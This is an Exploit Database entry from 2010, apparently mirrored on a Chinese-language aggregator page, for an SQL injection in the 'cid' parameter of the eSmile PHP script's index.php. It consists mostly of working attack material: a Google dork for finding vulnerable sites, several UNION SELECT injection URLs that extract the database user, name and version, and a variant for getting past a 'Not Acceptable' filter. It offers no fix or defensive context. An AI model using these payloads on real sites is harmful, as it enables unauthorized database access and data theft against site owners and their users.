eSmile Script – ‘index.php’ SQL Injection

• Exploit Database
• 37 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2010-02-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11382/

• eSmile (index.php) Sql Injection Vulnerability
  ==============================================================
  
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
  .:. Team : Sec Attack Team
  .:. Home : www.sec-attack.com/vb
  .:. Script : eSmile
  .:. Bug Type : Sql Injection[Mysql]
  .:. Dork : "Powered by: eSmile"
  
  ####################################################################
  
  ===[ Exploit ]===
  
  www.site.com/index.php?do=show&cid=null[Sql Injection]
  
  www.site.com/index.php?do=show&cid=null'/**/and/**/1=2/**/union/**/select/**/111,222,333,444,555,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
  www.site.com/index.php?do=show&cid=null'/**/and/**/1=2/**/union/**/select/**/111,222,333,444,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),666-- -
  
  T0 Bypass Not Acceptable
  
  
  www.site.com/index.php?do=show&cid=-NULL'/**/UNION/**/ALL/**/SELECT/**/111,222,333,444,555,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -